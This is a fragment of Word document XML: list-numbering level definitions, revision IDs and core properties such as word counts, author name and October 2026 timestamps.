      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9B60627C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8CAE69AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="07CA51FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="68A4BBD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6"/>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54F"/>
    <w:rsid w:val="000E60C1"/>
    <w:rsid w:val="004C5DC3"/>
    <w:rsid w:val="00A24EDC"/>
    <w:rsid w:val="00B553C8"/>
    <w:rsid w:val="00D2454F"/>
    <w:rsid w:val="00ED2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D34F7"/>
  <w15:docId w15:val="{B7F08BF9-81F1-40F7-96CE-49945305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00" w:after="20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1515</Words>
  <Characters>8637</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>71</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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nguyen</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-12T10:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-12T10:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>